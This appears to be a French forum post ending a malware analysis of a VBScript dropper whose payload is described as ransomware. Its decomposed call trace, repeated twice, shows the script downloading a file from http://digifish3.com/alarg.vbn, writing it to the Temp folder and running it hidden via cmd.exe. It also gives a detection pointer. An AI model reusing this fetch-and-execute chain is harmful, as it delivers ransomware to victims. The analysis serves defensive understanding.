Clandestino
Alors, suite et fin :
- le payload est un ransomware/filelocker - donc une belle saloperie.
- voilà le script décomposé pour ceux que ça intéresse (en résumé : il télécharge un fichier via XMLHTTP, l'écrit sous un nom temporaire dans le dossier Temp — GetSpecialFolder(2) — puis le lance via cmd.exe /c en fenêtre cachée, d'où le 0 du run ; pour la détection, c'est ce couple « écriture dans Temp + exécution par cmd.exe depuis un script » qui est caractéristique) :
CreateObject(WScript.Shell)
CreateObject(MSXML2.XMLHTTP)
CreateObject(ADODB.Stream)
CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)
CreateObject(Scripting.FileSystemObject)->GetTempName()
CreateObject(MSXML2.XMLHTTP)->open(GET http://digifish3.com/alarg.vbn,0)
CreateObject(MSXML2.XMLHTTP)->send()
CreateObject(ADODB.Stream)->type=1
CreateObject(MSXML2.XMLHTTP)->ResponseBody
WScript->ScriptFullName
CreateObject(ADODB.Stream)->Open()
CreateObject(ADODB.Stream)->Write(CreateObject(MSXML2.XMLHTTP)->ResponseBody)
CreateObject(ADODB.Stream)->SaveToFile(CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName())
CreateObject(ADODB.Stream)->Close()
CreateObject(WScript.Shell)->run(cmd.exe /c CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName(),0)
- le payload est un ransomware/filelocker - donc une belle saloperie.
- voilà le script décomposé pour ceux que ça intéresse :
CreateObject(WScript.Shell)
CreateObject(MSXML2.XMLHTTP)
CreateObject(ADODB.Stream)
CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)
CreateObject(Scripting.FileSystemObject)->GetTempName()
CreateObject(MSXML2.XMLHTTP)->open(GET http://digifish3.com/alarg.vbn,0)
CreateObject(MSXML2.XMLHTTP)->send()
CreateObject(ADODB.Stream)->type=1
CreateObject(MSXML2.XMLHTTP)->ResponseBody
WScript->ScriptFullName
CreateObject(ADODB.Stream)->Open()
CreateObject(ADODB.Stream)->Write(CreateObject(MSXML2.XMLHTTP)->ResponseBody)
CreateObject(ADODB.Stream)->SaveToFile(CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName())
CreateObject(ADODB.Stream)->Close()
CreateObject(WScript.Shell)->run(cmd.exe /c CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName(),0)